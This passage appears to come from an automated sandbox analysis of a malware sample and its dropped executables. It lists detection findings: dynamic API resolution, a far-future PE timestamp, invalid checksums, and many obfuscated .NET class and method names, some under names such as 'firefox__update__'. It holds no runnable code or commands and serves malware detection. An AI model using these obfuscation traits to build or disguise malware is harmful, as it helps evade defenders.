Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00495BE4 push ecx; mov dword ptr [esp], ecx	1_2_00495BE9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00419C38 push ecx; mov dword ptr [esp], ecx	1_2_00419C3D

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Binary contains a suspicious time stamp

Source: 7((_8888YTR(.exe.1.dr

Static PE information: 0xFC527B8E [Sun Feb 24 02:40:14 2104 UTC]

PE file contains an invalid checksum

Source: random.exe.10.dr	Static PE information: real checksum: 0x2b239 should be: 0x290bc
Source: ZHunuhebaqu.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x12c6d
Source: 7((_8888YTR(.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x90de2
Source: Kixysyshysy.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0xa8222
Source: Vahutuqeke.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x92ff1
Source: irecord.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x5d3e9d
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x1151b3
Source: 1nJGU59JPU.exe	Static PE information: real checksum: 0x0 should be: 0xc29aa

Source: 7((_8888YTR(.exe.1.dr, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 7((_8888YTR(.exe.1.dr, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 7((_8888YTR(.exe.1.dr, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 7((_8888YTR(.exe.1.dr, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 7((_8888YTR(.exe.1.dr, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 7((_8888YTR(.exe.1.dr, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 7((_8888YTR(.exe.1.dr, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 7((_8888YTR(.exe.1.dr, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: Vahutuqeke.exe.3.dr, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: Vahutuqeke.exe.3.dr, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: Vahutuqeke.exe.3.dr, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: Vahutuqeke.exe.3.dr, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: Vahutuqeke.exe.3.dr, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: Vahutuqeke.exe.3.dr, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: Vahutuqeke.exe.3.dr, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: Vahutuqeke.exe.3.dr, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: Vahutuqeke.exe.3.dr, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: Vahutuqeke.exe.3.dr, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
